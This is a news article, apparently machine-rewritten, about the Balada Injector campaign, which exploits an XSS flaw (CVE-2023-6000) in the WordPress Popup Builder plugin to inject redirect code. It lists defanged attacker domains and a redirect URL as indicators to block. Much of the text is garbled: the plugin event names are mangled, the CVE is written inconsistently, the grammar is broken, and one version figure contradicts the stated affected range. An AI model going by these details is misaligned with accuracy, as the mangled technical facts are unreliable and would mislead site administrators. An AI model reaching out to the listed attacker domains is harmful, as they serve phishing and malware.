News, AntaraNews – Hackers have hacked WordPress sites through exploiting a flaw in the older version of the Popup Builder plugin, infecting more than 3,300 sites with malware.
The vulnerability exploited by the attacks has been identified as CVE-2023 6000, an XSS or cross-site scripting (XSS) issue that impacts the Popup Builder version 4.2.3 or older. The vulnerability first was identified in November 2023.
The Balada Injector campaign uncovered at the beginning of this year exploited a particular flaw to attack more than 6,700 websites and indicated that many administrators of websites hadn’t been patched enough.
Sucuri is currently has reported that it has detected a new attack that has seen a significant increase in the last three weeks. targeting the same flaw in WordPress plugin.
Based on PublicWWW results Code injections related to this campaign’s latest ad are being detected within 329 WordPress websites as well as Sucuri’s scanners finding 170 malware infection.
Injection details
The malware attacks affect The Custom JavaScript or Custom CSS areas of the WordPress administration interface. the malicious code is located in the database table called ‘wp_postmeta’.
The main role of the injected code is acting as event handlers to different Popup Builder plugin events, like’sgpb’-ShouldOpen “sgpb’s GpbShouldClose”, “sgp as well as’sgpbWillClose’,’sgp” and “sgpbDidClose.’
This is because malicious code can be executed during specific events of the plugin such as when a popup is opened or closes.
Sucuri states that the precise steps of the malware could differ, however the main goal of the code appears to be redirecting people from the affected sites to dangerous websites including phishing websites as well as malware-dropping websites.
Specifically, in some infections, the analysts observed the code injecting a redirect URL (hxxp://ttincoming.traveltraffic[. Cc/?traffic) in the redirect-url option to display the “contact-form-7” popup.
The code above is retrieved by the code from an outside source, and inserts it into the page head to be executed by the browser.
In reality, it’s possible for attackers to accomplish many malicious purposes via this approach, some may be more damaging than redirections.
Defending from Hackers
The attacks originate from the domains “ttincoming.traveltraffic[. ]cc” and “host.cloudsonicwave[. . com” thus blocking these two domains is highly recommended.
If you’re running this Popup Builder plugin on your site, you should upgrade to the most recent version. It’s currently 4.2.7 that fixes CVE-2023-6000, as well as various security concerns.
WordPress statistics reveal that around 80000 active sites are currently using Popup Builder 4.1 or older, which means the threat remains substantial.
In the event of an infection, removal entails deletion of malicious files from Custom Sections of the Popup Builder and looking for backdoors that are hidden to avoid re-infection.